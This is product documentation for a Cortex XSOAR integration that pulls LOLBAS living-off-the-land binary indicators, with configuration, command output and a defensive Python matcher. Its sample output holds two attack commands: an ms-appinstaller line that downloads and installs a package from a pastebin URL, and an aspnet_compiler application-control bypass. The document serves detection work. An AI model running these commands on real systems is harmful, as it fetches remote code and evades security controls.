
LOLBAS Feed

This Integration is part of the LOLBAS Feed Pack.

Supported versions

Supported Cortex XSOAR versions: 6.8.0 and later.

This integration was integrated and tested with version v1 of LOLBAS.

Configure LOLBAS Feed on Cortex XSOAR

  1. Navigate to Settings > Integrations > Servers & Services.

  2. Search for LOLBAS Feed.

  3. Click Add instance to create and configure a new integration instance.

    Parameter | Description | Required
    --- | --- | ---
    Base URL | | True
    Fetch indicators | | False
    Indicator Reputation | Indicators from this integration instance will be marked with this reputation. | False
    Source Reliability | Reliability of the source providing the intelligence data. | True
    Traffic Light Protocol Color | The Traffic Light Protocol (TLP) designation to apply to indicators fetched from the feed. | False
    Bypass exclusion list | When selected, the exclusion list is ignored for indicators from this feed. This means that if an indicator from this feed is on the exclusion list, the indicator might still be added to the system. | False
    Use system proxy settings | | False
    Trust any certificate (not secure) | | False
    Tags | Supports CSV values. | False
    Create relationships | | False
    Feed Fetch Interval | | False
  4. Click Test to validate the URLs, token, and connection.

Commands

You can execute these commands from the Cortex XSOAR CLI, as part of an automation, or in a playbook. After you successfully execute a command, a DBot message appears in the War Room with the command details.

lolbas-get-indicators

Retrieves a limited number of indicators.

Base Command

lolbas-get-indicators

Input

Argument Name | Description | Required
--- | --- | ---
limit | The maximum number of indicators to return. | Required

Context Output

Path | Type | Description
--- | --- | ---
LOLBAS.Indicators.Commands.category | String | The category of the command.
LOLBAS.Indicators.Commands.command | String | The command.
LOLBAS.Indicators.Commands.description | String | The description of the command.
LOLBAS.Indicators.Commands.mitreid | String | The MITRE ID related to the command.
LOLBAS.Indicators.Commands.operatingsystem | String | The operating system the command ran on.
LOLBAS.Indicators.Commands.privileges | String | The privileges required to run the command.
LOLBAS.Indicators.Commands.usecase | String | The use case of the command.
LOLBAS.Indicators.Description | String | The description of the indicator.
LOLBAS.Indicators.Detections.content | String | The content of the detection.
LOLBAS.Indicators.Detections.type | String | The type of the detection.
LOLBAS.Indicators.Name | String | The name of the indicator.
LOLBAS.Indicators.Paths.path | String | The path of the indicator.
LOLBAS.Indicators.Type | String | The type of the indicator.

Command example

!lolbas-get-indicators limit=2

Context Example

{
  "LOLBAS": {
    "Indicators": [
      {
        "Commands": [
          {
            "category": "Download",
            "command": "start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw",
            "description": "AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\\Users\\%username%\\AppData\\Local\\Packages\\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\\AC\\INetCache\\<RANDOM-8-CHAR-DIRECTORY>",
            "mitreid": "Ingress Tool Transfer",
            "operatingsystem": "Windows 10, Windows 11",
            "privileges": "User",
            "usecase": "Download file from Internet"
          }
        ],
        "Description": "Tool used for installation of AppX/MSIX applications on Windows 10",
        "Detections": [
          {
            "content": "https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml",
            "type": "Sigma"
          }
        ],
        "Name": "AppInstaller.exe",
        "Paths": [
          {
            "path": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"
          }
        ],
        "Type": "Tool"
      },
      {
        "Commands": [
          {
            "category": "AWL Bypass",
            "command": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe -v none -p C:\\users\\cpl.internal\\desktop\\asptest\\ -f C:\\users\\cpl.internal\\desktop\\asptest\\none -u",
            "description": "Execute C# code with the Build Provider and proper folder structure in place.",
            "mitreid": "Trusted Developer Utilities Proxy Execution",
            "operatingsystem": "Windows 10, Windows 11",
            "privileges": "User",
            "usecase": "Execute proxied payload with Microsoft signed binary to bypass application control solutions"
          }
        ],
        "Description": "ASP.NET Compilation Tool",
        "Detections": [
          {
            "content": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
            "type": "BlockRule"
          },
          {
            "content": "https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml",
            "type": "Sigma"
          }
        ],
        "Name": "Aspnet_Compiler.exe",
        "Paths": [
          {
            "path": "c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"
          },
          {
            "path": "c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"
          }
        ],
        "Type": "Tool"
      }
    ]
  }
}
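The context structure above is what a playbook or automation typically consumes. The following is an added example, not code from the Cortex XSOAR integration or from the LOLBAS project, showing one defensive use of it: indexing `LOLBAS.Indicators` by name and by documented path, then matching Windows process-creation events against that index so each hit carries the feed's categories, MITRE technique names and detection references (Sigma rule or block rule) for the analyst to pivot on. The indicator sample is constructed from the two entries in the context example with the `command` fields left out; the process-creation events and their field names (`id`, `Image`) are constructed for this example.

```python
"""Enrich process-creation events with LOLBAS feed context.

Added example (not part of the Cortex XSOAR integration or the LOLBAS
project). Matches an event's image path against the indicator paths and
names from the LOLBAS.Indicators context and returns the detection
references the feed supplies for that binary.
"""
import ntpath

# Constructed sample: the two indicators from the context example above,
# trimmed to the fields the matcher uses (no "command" strings).
SAMPLE_INDICATORS = [
    {
        "Name": "AppInstaller.exe",
        "Type": "Tool",
        "Description": "Tool used for installation of AppX/MSIX applications on Windows 10",
        "Paths": [
            {"path": "C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\\AppInstaller.exe"},
        ],
        "Detections": [
            {"type": "Sigma", "content": "https://github.com/SigmaHQ/sigma/blob/bdb00f403fd8ede0daa04449ad913200af9466ff/rules/windows/dns_query/win_dq_lobas_appinstaller.yml"},
        ],
        "Commands": [
            {"category": "Download", "mitreid": "Ingress Tool Transfer", "privileges": "User"},
        ],
    },
    {
        "Name": "Aspnet_Compiler.exe",
        "Type": "Tool",
        "Description": "ASP.NET Compilation Tool",
        "Paths": [
            {"path": "c:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\aspnet_compiler.exe"},
            {"path": "c:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"},
        ],
        "Detections": [
            {"type": "BlockRule", "content": "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},
            {"type": "Sigma", "content": "https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml"},
        ],
        "Commands": [
            {"category": "AWL Bypass", "mitreid": "Trusted Developer Utilities Proxy Execution", "privileges": "User"},
        ],
    },
]

# Constructed sample process-creation events (field names are assumptions).
SAMPLE_EVENTS = [
    {"id": 1, "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\aspnet_compiler.exe"},
    {"id": 2, "Image": "C:\\Users\\alice\\Downloads\\AppInstaller.exe"},
    {"id": 3, "Image": "C:\\Windows\\System32\\notepad.exe"},
]


def build_index(indicators):
    """Index indicators by lower-cased binary name and by lower-cased full path.

    Windows paths are case-insensitive, and the feed itself mixes "C:" and "c:",
    so everything is normalised before comparison.
    """
    by_name, by_path = {}, {}
    for ind in indicators:
        by_name[ind["Name"].lower()] = ind
        for entry in ind.get("Paths", []):
            by_path[entry["path"].lower()] = ind
    return by_name, by_path


def match_event(image_path, index):
    """Return (indicator, kind) where kind is "path", "name-only", or (None, None)."""
    by_name, by_path = index
    norm = image_path.lower()
    if norm in by_path:
        return by_path[norm], "path"
    base = ntpath.basename(norm)
    if base in by_name:
        # Same binary name outside its documented location: still a LOLBAS hit,
        # and the unexpected path is worth surfacing to the analyst on its own.
        return by_name[base], "name-only"
    return None, None


def enrich_events(events, indicators):
    """Attach LOLBAS context (categories, MITRE names, detections) to matching events."""
    index = build_index(indicators)
    hits = []
    for ev in events:
        ind, kind = match_event(ev["Image"], index)
        if ind is None:
            continue
        cmds = ind.get("Commands", [])
        hits.append({
            "event_id": ev["id"],
            "lolbas_name": ind["Name"],
            "match": kind,
            "categories": sorted({c["category"] for c in cmds}),
            "mitre": sorted({c["mitreid"] for c in cmds}),
            "detections": [d["content"] for d in ind.get("Detections", [])],
        })
    return hits


if __name__ == "__main__":
    for hit in enrich_events(SAMPLE_EVENTS, SAMPLE_INDICATORS):
        print(hit)
```

In a playbook the `indicators` argument would come from the `LOLBAS.Indicators` context produced by `!lolbas-get-indicators`, and the events from whatever EDR or Sysmon source the playbook is triaging; the matcher itself does not depend on either.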

Human Readable Output

LOLBAS indicators

Name | Description
--- | ---
AppInstaller.exe | Tool used for installation of AppX/MSIX applications on Windows 10
Aspnet_Compiler.exe | ASP.NET Compilation Tool